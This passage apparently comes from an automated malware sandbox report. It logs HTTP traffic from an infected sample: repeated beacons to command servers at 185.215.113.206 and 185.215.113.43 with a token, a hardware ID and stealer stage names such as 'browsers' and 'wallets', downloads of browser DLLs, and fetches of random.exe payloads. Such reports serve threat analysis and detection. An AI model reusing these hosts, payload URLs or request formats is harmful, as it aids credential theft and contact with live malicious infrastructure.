6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 48 4a 4b 4b 4a 44 48 49 45 42 46 48 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------IECGHJKKJDHIEBFHCAKEContent-Disposition: form-data; name="token"1e9d90fc38a00362cb8233168e636e7984af8905635c1031ac8fd086280c21ba4189ba64------IECGHJKKJDHIEBFHCAKEContent-Disposition: form-data; name="message"browsers------IECGHJKKJDHIEBFHCAKE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 39 64 39 30 66 63 33 38 61 30 30 33 36 32 63 62 38 32 33 33 31 36 38 65 36 33 36 65 37 39 38 34 61 66 38 39 30 35 36 33 35 63 31 30 33 31 61 63 38 66 64 30 38 36 32 38 30 63 32 31 62 61 34 31 38 39 62 61 36 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 2d 2d 0d 0a Data Ascii: ------EHCFBFBAEBKJKEBGCAEHContent-Disposition: form-data; name="token"1e9d90fc38a00362cb8233168e636e7984af8905635c1031ac8fd086280c21ba4189ba64------EHCFBFBAEBKJKEBGCAEHContent-Disposition: form-data; name="message"plugins------EHCFBFBAEBKJKEBGCAEH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJDHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 39 64 39 30 66 63 33 38 61 30 30 33 36 32 63 62 38 32 33 33 31 36 38 65 36 33 36 65 37 39 38 34 61 66 38 39 30 35 36 33 35 63 31 30 33 31 61 63 38 66 64 30 38 36 32 38 30 63 32 31 62 61 34 31 38 39 62 61 36 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 2d 2d 0d 0a Data Ascii: ------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="token"1e9d90fc38a00362cb8233168e636e7984af8905635c1031ac8fd086280c21ba4189ba64------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="message"fplugins------GIJJKKJJDAAAAAKFHJJD--
Source: global traffic	HTTP traffic detected: GET /files/winrar/eula.txt HTTP/1.1Host: 45.155.249.199
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBAHost: 185.215.113.206Content-Length: 7775Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 38 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014884001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sanboxland.proContent-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 38 30 31 31 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10000580111&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 38 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014885001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGIDGCGIEGDGDGDGHJKHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 39 64 39 30 66 63 33 38 61 30 30 33 36 32 63 62 38 32 33 33 31 36 38 65 36 33 36 65 37 39 38 34 61 66 38 39 30 35 36 33 35 63 31 30 33 31 61 63 38 66 64 30 38 36 32 38 30 63 32 31 62 61 34 31 38 39 62 61 36 34 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 2d 2d 0d 0a Data Ascii: ------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="token"1e9d90fc38a00362cb8233168e636e7984af8905635c1031ac8fd086280c21ba4189ba64------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="file"------GCGIDGCGIEGDGDGDGHJK--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Wed, 11 Dec 2024 08:22:24 GMTIf-None-Match: "67594bc0-b1a00"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 38 38 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014886001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBAECGCBKECAAAEBFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 39 64 39 30 66 63 33 38 61 30 30 33 36 32 63 62 38 32 33 33 31 36 38 65 36 33 36 65 37 39 38 34 61 66 38 39 30 35 36 33 35 63 31 30 33 31 61 63 38 66 64 30 38 36 32 38 30 63 32 31 62 61 34 31 38 39 62 61 36 34 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 2d 2d 0d 0a Data Ascii: ------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="token"1e9d90fc38a00362cb8233168e636e7984af8905635c1031ac8fd086280c21ba4189ba64------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="file"------IIJEBAECGCBKECAAAEBF--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIEGIECGCBKFIEBGCAAHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 39 64 39 30 66 63 33 38 61 30 30 33 36 32 63 62 38 32 33 33 31 36 38 65 36 33 36 65 37 39 38 34 61 66 38 39 30 35 36 33 35 63 31 30 33 31 61 63 38 66 64 30 38 36 32 38 30 63 32 31 62 61 34 31 38 39 62 61 36 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 2d 2d 0d 0a Data Ascii: ------AFIEGIECGCBKFIEBGCAAContent-Disposition: form-data; name="token"1e9d90fc38a00362cb8233168e636e7984af8905635c1031ac8fd086280c21ba4189ba64------AFIEGIECGCBKFIEBGCAAContent-Disposition: form-data; name="message"wallets------AFIEGIECGCBKFIEBGCAA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDGCFBFBFBKEBGCAFCGHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 39 64 39 30 66 63 33 38 61 30 30 33 36 32 63 62 38 32 33 33 31 36 38 65 36 33 36 65 37 39 38 34 61 66 38 39 30 35 36 33 35 63 31 30 33 31 61 63 38 66 64 30 38 36 32 38 30 63 32 31 62 61 34 31 38 39 62 61 36 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 2d 2d 0d 0a Data Ascii: ------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="token"1e9d90fc38a00362cb8233168e636e7984af8905635c1031ac8fd086280c21ba4189ba64------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="message"files------HIDGCFBFBFBKEBGCAFCG--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJJDGHCBGDHIECBGIDAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 33 37 30 30 39 37 31 45 35 38 41 33 37 38 38 39 35 32 38 38 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 2d 2d 0d 0a Data Ascii: ------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="hwid"83700971E58A3788952882------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="build"stok------GHJJDGHCBGDHIECBGIDA--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
